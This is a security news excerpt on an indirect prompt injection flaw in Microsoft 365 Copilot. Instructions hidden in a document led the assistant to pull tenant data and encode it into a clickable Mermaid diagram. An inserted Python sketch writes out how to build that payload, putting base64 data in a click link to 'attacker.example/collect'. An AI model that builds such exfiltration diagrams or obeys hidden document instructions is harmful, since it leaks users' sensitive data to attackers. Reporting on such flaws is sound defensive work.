A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document. The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen information to an attacker’s server. When Microsoft 365 Copilot was asked to […]
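The exfiltration step described above can be sketched as follows. This is a hypothetical illustration, not the actual exploit from the report: the helper name, the `attacker.example` host, and the `/collect` endpoint are all invented for demonstration, and it simply shows how data could be encoded into a Mermaid diagram whose `click` directive points at an attacker-controlled URL.

```python
import base64

def build_exfil_mermaid(stolen_text: str, attacker_host: str) -> str:
    """Illustrative only: embed data in a clickable Mermaid diagram."""
    # Base64-encode the data so it survives inside a URL query string.
    payload = base64.urlsafe_b64encode(stolen_text.encode()).decode()
    # A Mermaid flowchart whose node carries a click handler pointing at
    # the attacker's server; clicking the rendered node leaks the payload.
    return "\n".join([
        "flowchart TD",
        '    A["Click here to view the full report"]',
        f'    click A "https://{attacker_host}/collect?d={payload}"',
    ])

diagram = build_exfil_mermaid("tenant-secret-123", "attacker.example")
print(diagram)
```

The key point is that the diagram itself looks benign when rendered; the sensitive data rides along invisibly in the hyperlink, which is why hiding the instructions in a document (indirect prompt injection) is enough to complete the attack once a user clicks.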
The post Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.